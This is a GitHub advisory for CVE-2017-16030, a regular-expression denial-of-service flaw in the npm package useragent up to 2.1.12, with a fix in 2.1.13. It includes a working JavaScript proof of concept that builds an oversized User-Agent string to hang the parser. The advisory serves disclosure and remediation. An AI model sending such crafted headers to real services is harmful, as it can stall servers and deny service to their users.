
ReDoS via long UserAgent header in useragent

High severity GitHub Reviewed Published Jul 24, 2018 to the GitHub Advisory Database • Updated Sep 6, 2023

Package

npm useragent (npm)

Affected versions

<= 2.1.12

Patched versions

2.1.13

Description

Affected versions of useragent are vulnerable to regular expression denial of service (ReDoS): parsing an arbitrarily long User-Agent header drives one of the parser's regular expressions into catastrophic backtracking, so a single request with a crafted header can keep the Node.js event loop busy for an unbounded time and block every other request on that process.

Proof of Concept

```javascript
var useragent = require('useragent');

// Trigger shape: an MSIE version prefix, a very long run of digits
// (Array(900000).join('0') yields 899,999 zeros) and a trailing "XBLWP"
// literal that makes the final part of the pattern fail, forcing the
// engine to retry every way of splitting the digit run.
var badUserAgent = 'MSIE 0.0' + Array(900000).join('0') + 'XBLWP';

// useragent.parse() takes the User-Agent value itself; the regexes are
// unanchored, so wrapping it in a request line (as the original PoC did)
// leaves the outcome unchanged. Expect this call to hang.
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));
```

Recommendation

Update to version 2.1.13 or later.

References

Published to the GitHub Advisory Database Jul 24, 2018
Reviewed Jun 16, 2020
Last updated Sep 6, 2023

Severity

High

EPSS score

0.124%
(48th percentile)

Weaknesses

CVE ID

CVE-2017-16030

GHSA ID

GHSA-pjmx-9xr3-82qr

Source code

No known source code